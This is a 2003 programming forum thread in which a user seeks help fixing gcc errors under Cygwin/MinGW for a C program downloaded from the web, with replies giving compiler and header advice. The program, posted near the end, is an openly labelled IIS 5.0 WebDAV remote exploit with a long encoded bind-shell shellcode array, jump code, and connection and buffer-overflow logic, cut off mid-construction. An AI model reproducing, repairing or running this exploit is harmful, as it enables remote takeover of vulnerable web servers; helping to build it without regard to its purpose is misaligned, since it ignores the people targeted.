Solved

"storage size of 'dst' isn't known" ??? any ideas?

Posted on 2003-03-31
1,677 Views
Last Modified: 2013-11-15
I am trying to compile this program, and I keep getting this error:

$ gcc test.c
test.c:128:3: warning: multi-line string literals are deprecated
test.c: In function `main':
test.c:140: storage size of `dst' isn't known
test.c:145:18: warning: multi-line string literals are deprecated
test.c:172:27: warning: multi-line string literals are deprecated
test.c:183:27: warning: multi-line string literals are deprecated
test.c:244:34: warning: multi-line string literals are deprecated
test.c:262:10: warning: multi-line string literals are deprecated
test.c:275:16: warning: multi-line string literals are deprecated
test.c:278:12: warning: multi-line string literals are deprecated

Same if I use 'gcc test.c -o test.exe'

Any ideas?
0
Question by:MtM
28 Comments
 
LVL 22

Expert Comment

by:grg99
ID: 8241782
Well, you seem to have something named "dst" that isn't declared before line 140.  

You also have some multi-line literals, which often is a sign of some end-of-line problems.   Did you FTP this file from a DOS system or somesuch?


How about posting your code so we can see what's up?


0
 

Author Comment

by:MtM
ID: 8241830
What's your e-mail?  I can forward it to you.
0
 
 

Author Comment

by:MtM
ID: 8241844
I think the problem starts here:

int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

......
0
 

Author Comment

by:MtM
ID: 8241866
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

...... Skip down a little bit....

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\
n" \
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:search
request>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

I got it off the web
0
 

Author Comment

by:MtM
ID: 8241871
*Note, that's not all of it... but I was hoping the problem is in there....
0
 
LVL 6

Accepted Solution

by:
GaryFx earned 225 total points
ID: 8241884
Do you have any relevant include lines?  On my system you need to #include <netinet/in.h> in order to get the definition of struct sockaddr_in.

Gary
0
 

Author Comment

by:MtM
ID: 8241930
What do you mean?  I did include netinet/in.h. That is not the whole program there, and I cut some stuff out to save space... did I not declare dst right somewhere?
0
 
LVL 6

Expert Comment

by:GaryFx
ID: 8241940
I posted my previous note before seeing your more extended posting.

Try getting rid of the backslash at the end of the first line of the definition of body (outside the double quote).

Gary
0
 

Author Comment

by:MtM
ID: 8241950
I get the same thing... :-/
0
 

Author Comment

by:MtM
ID: 8241963
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)

That is at the very bottom... and the only other part of the code that has 'dst' in it
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8242035
For the 'deprecated' error, try making body[] into a single string, instead of 2 strings separated by the backslash, i.e. remove the " before the \, and remove the \, and remove the " that used to be right after the \.

And for dst, you might want to look at netinet\in.h and see the definition of struct sockaddr_in - maybe you need to set something up in order for the size of one of its fields to be known.  Feel free to post your compiler's definition of struct sockaddr_in - maybe somebody here can spot the problem.
0
 
LVL 6

Expert Comment

by:GaryFx
ID: 8242589
What version of gcc are you using?  

Gary
0
 
LVL 1

Expert Comment

by:sarda_ramesh
ID: 8244464
Hi there,

It seems that this is not a very big problem. You are expanding strings over two lines; don't do that, put it on a single line. E.g. if the string constant is like

"hello \
 world"

write it as "hello world".

In the vi editor, if the string is longer than the horizontal number of characters it will continue on the next line, but if you look at the line numbers (use :set nu) you will see that the two lines are actually one. Try using this.

regards
ramesh

0
 

Author Comment

by:MtM
ID: 8245969
I am using cygwin to emulate unix, and then moved over to
minGW for gcc... (DOWNLOADED it yesterday, so newest I guess) and I'm actually not sure of the version.  I have two if.h's, the first includes the other... Here are both of them:


/* netinet/in.h

   Copyright 1998, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _NETINET_IN_H
#define _NETINET_IN_H

#include <cygwin/in.h>

#endif /* _NETINET_IN_H */


THERE'S THE NEXT ONE:


/* cygwin/if.h

   Copyright 1996, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _CYGWIN_IF_H_
#define _CYGWIN_IF_H_

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */

#include <sys/types.h>
#include <sys/socket.h>

/* Standard interface flags. */
#define IFF_UP          0x1             /* interface is up              */
#define IFF_BROADCAST   0x2             /* broadcast address valid      */
#define IFF_LOOPBACK    0x8             /* is a loopback net            */
#define IFF_NOTRAILERS  0x20            /* avoid use of trailers        */
#define IFF_RUNNING     0x40            /* resources allocated          */
#define IFF_PROMISC     0x100           /* receive all packets          */
#define IFF_MULTICAST   0x1000          /* Supports multicast           */

/*
 * Interface request structure used for socket
 * ioctl's.  All interface ioctl's must have parameter
 * definitions which begin with ifr_name.  The
 * remainder may be interface specific.
 */

struct ifreq
{
#define IFNAMSIZ        16
#define IFHWADDRLEN     6
     union
     {
          char    ifrn_name[IFNAMSIZ];            /* if name, e.g. "en0" */
     } ifr_ifrn;

     union {
          struct  sockaddr ifru_addr;
          struct  sockaddr ifru_broadaddr;
          struct  sockaddr ifru_netmask;
          struct  sockaddr ifru_hwaddr;
          short   ifru_flags;
          int     ifru_metric;
          int     ifru_mtu;
     } ifr_ifru;
};

#define ifr_name        ifr_ifrn.ifrn_name      /* interface name       */
#define ifr_addr        ifr_ifru.ifru_addr      /* address              */
#define ifr_broadaddr   ifr_ifru.ifru_broadaddr /* broadcast address    */
#define ifr_netmask     ifr_ifru.ifru_netmask   /* interface net mask   */
#define ifr_flags       ifr_ifru.ifru_flags     /* flags                */
#define ifr_hwaddr      ifr_ifru.ifru_hwaddr    /* MAC address          */
#define ifr_metric      ifr_ifru.ifru_metric    /* metric               */
#define ifr_mtu         ifr_ifru.ifru_mtu       /* mtu                  */


/*
 * Structure used in SIOCGIFCONF request.
 * Used to retrieve interface configuration
 * for machine (useful for programs which
 * must know all networks accessible).
 */

struct ifconf
{
     int     ifc_len;                        /* size of buffer       */
     union
     {
          caddr_t ifcu_buf;
          struct  ifreq *ifcu_req;
     } ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf               /* buffer address       */
#define ifc_req ifc_ifcu.ifcu_req               /* array of structures  */

#ifdef __cplusplus
};
#endif /* __cplusplus */

#endif /* _CYGWIN_IF_H_ */
0
 

Author Comment

by:MtM
ID: 8246066
test1.c: In function `main':
test1.c:138: storage size of `dst' isn't known

That is the only error I'm getting now... took care of all those warnings.  I'm so close :-/
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8246139
You posted cygwin/if.h, not cygwin/in.h - can you post your in.h?
0
 

Author Comment

by:MtM
ID: 8246192
My problem before was that I had two of the same in.h in both those folders... So one of them was just including the same file again.  Now that I have it including the right in.h with the actual information about all the tcpip stuff it needs... I get this error:

In File included from c:/cygwin/lib/gcc-lib/mingw32/3.2/include/netinet/in.h:14,from test1.c:8:

c:/cygwin/lib/gcc-lib/mingw32/3.2/include/cygwin/in.h:40: parse error before "in_port_t:

c:/cygwin.lib/gcc-lib/wingw32/include/cygwin/in.h:81: parse error before :in_addr_t:

Thanks for your help again
0
 

Author Comment

by:MtM
ID: 8246198

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{


Looks like that's the line it's having problems with
0
 

Author Comment

by:MtM
ID: 8246224
Oops.. sorry, here's the in.h

/*
 * INET            An implementation of the TCP/IP protocol suite for the LINUX
 *            operating system.  INET is implemented using the  BSD Socket
 *            interface as the means of communication with the user level.
 *
 *            Definitions of the Internet Protocol.
 *
 * Version:      @(#)in.h      1.0.1      04/21/93
 *
 * Authors:      Original taken from the GNU Project <netinet/in.h> file.
 *            Fred N. van Kempen, <waltje@uWalt.NL.Mugnet.ORG>
 *
 *            This program is free software; you can redistribute it and/or
 *            modify it under the terms of the GNU General Public License
 *            as published by the Free Software Foundation; either version
 *            2 of the License, or (at your option) any later version.
 */
#ifndef _CYGWIN_IN_H
#define _CYGWIN_IN_H

#include <cygwin/types.h>

/* Standard well-defined IP protocols.  */
enum
{
  IPPROTO_IP = 0,            /* Dummy protocol for TCP            */
  IPPROTO_ICMP = 1,            /* Internet Control Message Protocol      */
  IPPROTO_IGMP = 2,            /* Internet Gateway Management Protocol */
  IPPROTO_IPIP = 4,            /* IPIP tunnels (older KA9Q tunnels use 94) */
  IPPROTO_TCP = 6,            /* Transmission Control Protocol      */
  IPPROTO_EGP = 8,            /* Exterior Gateway Protocol            */
  IPPROTO_PUP = 12,            /* PUP protocol                        */
  IPPROTO_UDP = 17,            /* User Datagram Protocol            */
  IPPROTO_IDP = 22,            /* XNS IDP protocol                  */

  IPPROTO_RAW = 255,            /* Raw IP packets                  */
  IPPROTO_MAX
};

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{
  IPPORT_ECHO = 7,            /* Echo service.  */
  IPPORT_DISCARD = 9,            /* Discard transmissions service.  */
  IPPORT_SYSTAT = 11,            /* System status service.  */
  IPPORT_DAYTIME = 13,      /* Time of day service.  */
  IPPORT_NETSTAT = 15,      /* Network status service.  */
  IPPORT_FTP = 21,            /* File Transfer Protocol.  */
  IPPORT_TELNET = 23,            /* Telnet protocol.  */
  IPPORT_SMTP = 25,            /* Simple Mail Transfer Protocol.  */
  IPPORT_TIMESERVER = 37,      /* Timeserver service.  */
  IPPORT_NAMESERVER = 42,      /* Domain Name Service.  */
  IPPORT_WHOIS = 43,            /* Internet Whois service.  */
  IPPORT_MTP = 57,

  IPPORT_TFTP = 69,            /* Trivial File Transfer Protocol.  */
  IPPORT_RJE = 77,
  IPPORT_FINGER = 79,            /* Finger service.  */
  IPPORT_TTYLINK = 87,
  IPPORT_SUPDUP = 95,            /* SUPDUP protocol.  */


  IPPORT_EXECSERVER = 512,      /* execd service.  */
  IPPORT_LOGINSERVER = 513,      /* rlogind service.  */
  IPPORT_CMDSERVER = 514,
  IPPORT_EFSSERVER = 520,

  /* UDP ports.  */
  IPPORT_BIFFUDP = 512,
  IPPORT_WHOSERVER = 513,
  IPPORT_ROUTESERVER = 520,

  /* Ports less than this value are reserved for privileged processes.  */
  IPPORT_RESERVED = 1024,

  /* Ports greater this value are reserved for (non-privileged) servers.  */
  IPPORT_USERRESERVED = 5000
};

typedef uint32_t in_addr_t;
/* Internet address. */
struct in_addr
{
  unsigned int s_addr;
};

/* Request struct for multicast socket ops */

struct ip_mreq
{
  struct in_addr imr_multiaddr;      /* IP multicast address of group */
  struct in_addr imr_interface;      /* local IP address of interface */
};


/* Structure describing an Internet (IP) socket address. */
#define __SOCK_SIZE__      16            /* sizeof(struct sockaddr)      */
struct sockaddr_in
{
  short int sin_family;      /* Address family            */
  unsigned short int sin_port;      /* Port number                  */
  struct in_addr sin_addr;      /* Internet address            */

  /* Pad to size of `struct sockaddr'. */
  unsigned char  __pad[__SOCK_SIZE__ - sizeof(short int)
                  - sizeof(unsigned short int) - sizeof(struct in_addr)];
};
#define sin_zero      __pad            /* for BSD UNIX comp. -FvK      */

/*
 * Definitions of the bits in an Internet address integer.
 * On subnets, host and network parts are found according
 * to the subnet mask, not these masks.
 */
#define      IN_CLASSA(a)            ((((long int) (a)) & 0x80000000) == 0)
#define      IN_CLASSA_NET            0xff000000
#define      IN_CLASSA_NSHIFT      24
#define      IN_CLASSA_HOST            (0xffffffff & ~IN_CLASSA_NET)
#define      IN_CLASSA_MAX            128

#define      IN_CLASSB(a)            ((((long int) (a)) & 0xc0000000) == 0x80000000)
#define      IN_CLASSB_NET            0xffff0000
#define      IN_CLASSB_NSHIFT      16
#define      IN_CLASSB_HOST            (0xffffffff & ~IN_CLASSB_NET)
#define      IN_CLASSB_MAX            65536

#define      IN_CLASSC(a)            ((((long int) (a)) & 0xe0000000) == 0xc0000000)
#define      IN_CLASSC_NET            0xffffff00
#define      IN_CLASSC_NSHIFT      8
#define      IN_CLASSC_HOST            (0xffffffff & ~IN_CLASSC_NET)

#define      IN_CLASSD(a)            ((((long int) (a)) & 0xf0000000) == 0xe0000000)
#define      IN_MULTICAST(a)            IN_CLASSD(a)
#define IN_MULTICAST_NET      0xF0000000

#define      IN_EXPERIMENTAL(a)      ((((long int) (a)) & 0xe0000000) == 0xe0000000)
#define      IN_BADCLASS(a)            ((((long int) (a)) & 0xf0000000) == 0xf0000000)

/* Address to accept any incoming messages. */
#define      INADDR_ANY            ((unsigned long int) 0x00000000)

/* Address to send to all hosts. */
#define      INADDR_BROADCAST      ((unsigned long int) 0xffffffff)

/* Address indicating an error return. */
#define      INADDR_NONE            0xffffffff

/* Network number for local host loopback. */
#define      IN_LOOPBACKNET            127

/* Address to loopback in software to local host.  */
#define      INADDR_LOOPBACK            0x7f000001      /* 127.0.0.1   */
#define      IN_LOOPBACK(a)            ((((long int) (a)) & 0xff000000) == 0x7f000000)

/* Defines for Multicast INADDR */
#define INADDR_UNSPEC_GROUP      0xe0000000      /* 224.0.0.0   */
#define INADDR_ALLHOSTS_GROUP      0xe0000001      /* 224.0.0.1   */
#define INADDR_MAX_LOCAL_GROUP  0xe00000ff      /* 224.0.0.255 */

/* <asm/byteorder.h> contains the htonl type stuff.. */

#include <asm/byteorder.h>

/* Some random defines to make it easier in the kernel.. */
#ifdef __KERNEL__

#define LOOPBACK(x)      (((x) & htonl(0xff000000)) == htonl(0x7f000000))
#define MULTICAST(x)      (((x) & htonl(0xf0000000)) == htonl(0xe0000000))

#endif

/* IPv6 definitions as we start to include them. This is just
   a beginning dont get excited 8) */
struct in6_addr
{
  unsigned char s6_addr[16];
};

struct sockaddr_in6
{
  unsigned short sin6_family;
  unsigned short sin6_port;
  unsigned long sin6_flowinfo;
  struct in6_addr sin6_addr;
};
#endif      /* _CYGWIN_IN_H */
0
 

Author Comment

by:MtM
ID: 8246276
I also just realized that I moved one sys/types.h into both my cygwin dirs because I was getting "conflicting types for 'ino_t'".  When I put them back to default, with the in.h also at default, the error reads like this:

In file included from c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/in.h:21,
from c:/cygwin/lib/gcc-lb/wingw32/3.2/include/netinet/in.h:14, from test1.c:8:
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/types.h:98: conflicting types for 'ino_t'
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/sys/types.h:121: previous declaration of 'ino_t'
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8246305
I think the problem is that the compiler doesn't know what uint32_t and uint16_t are.  At the top of in.h, there is an include of cygwin/types.h.  You might want to check to see whether uintxx_t are typedef'ed in there.  If they are, there might be an #ifndef that's preventing them from being seen by the compiler.  If you can't figure out why uintxx_t aren't being defined, then as an ugly hack, you can add the following 2 lines to your source file before including in.h:
typedef unsigned long uint32_t;   /* typedef takes the existing type first, then the new name */
typedef unsigned short uint16_t;
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8246368
Sorry, I posted before your final post.  It's not ideal to have 2 different 'types.h' being included by the same .c file.  It's even more dangerous if different .c files include DIFFERENT 'types.h'.  One thing you could try is ensure that the 2 different types.h are identical.  Temporarily rename sys\types.h sys\types.h.old and then copy cygwin\types.h sys\types.h.
0
 

Author Comment

by:MtM
ID: 8246608
I'm sure it's my inexperience, and the fact that I'm using cygwin with minGW, but I can't figure this out.  There is the whole program I'm trying to compile; maybe someone with a real linux/unix compiler can actually compile it.  Then maybe I will know what's up.

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <strings.h>     /* bcopy(), bzero() */
#include <stdlib.h>
#include <unistd.h>      /* close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

 
// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

unsigned char shellcode[] =            // Deepzone shellcode
  "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
  "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
  "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
  "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
  "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
  "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
  "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
  "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
  "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
  "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
  "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
  "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
  "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
  "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
  "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
  "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
  "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
  "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
  "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
  "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
  "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
  "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
  "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
  "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
  "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
  "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
  "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
  "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
  "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
  "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
  "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
  "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
  "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
  "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
  "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
  "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
  "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
  "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
  "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
  "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
  "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
  "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
  "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
  "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
  "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
  "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
  "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
  "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
  "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
  "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
  "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
  "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
  "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
  "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
  "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
  "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
  "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
  "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
  "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
  "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
  "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
  "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
  "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
  "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
  "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
  "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
  "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

  if (argc < 2 || argc > 5)
        {
          printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
          exit(-1);
        }
 
  // Default target port = 80
  if (argc > 2)
        tport = atoi(argv[2]);
  else
        tport = 80;

  // Default bind port = 31337
  if (argc > 3)
        bport = atoi(argv[3]);
  else
        bport = 31337;

  // Default ret value = RET
  if (argc > 4)
        ret = strtoul(argv[4], NULL, 16);
  else
        ret = RET;

  if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
        {
          fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
          exit(-2);
        }
   
  // Shellcode patching
  port = htons(bport);
  port ^= 0x9999;
 
  if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
        {
          fprintf(stderr, "Binding-port contains null-byte. Use another port.\n Aborted!\n");
          exit(-3);
        }
 
  *(unsigned short *)&shellcode[PORT_OFFSET] = port;
  *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
  *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
  // If the last two items contain any null-bytes, exploit will fail.
  // WARNING: this check is not performed here. Be careful and check it for you

 
  // Resolve hostname
  printf("[*] Resolving hostname ...\n");
  if ((h = gethostbyname(argv[1])) == NULL)
        {
          fprintf(stderr, "%s: unknown hostname\n", argv[1]);
          exit(-4);
        }
 
  bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
        {
          perror("Failed to connect");
          exit(-6);
        }
 
  // Build malicious string...
  printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1],
((ret >> 8) & 0xff), ret & 0xff);

  bzero(buffer, MAXBUF);
  strcpy(buffer, "SEARCH /");
 
  i = strlen(buffer);
  buffer[i] = NOP;         // Align for RET overwrite

  // Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill
 
  for (j=i+1; j < i+2150; j+=2)
        *(unsigned short *)&buffer[j] = (unsigned short)ret;

  // The rest is padded with NOP's. RET address should point to this zone!
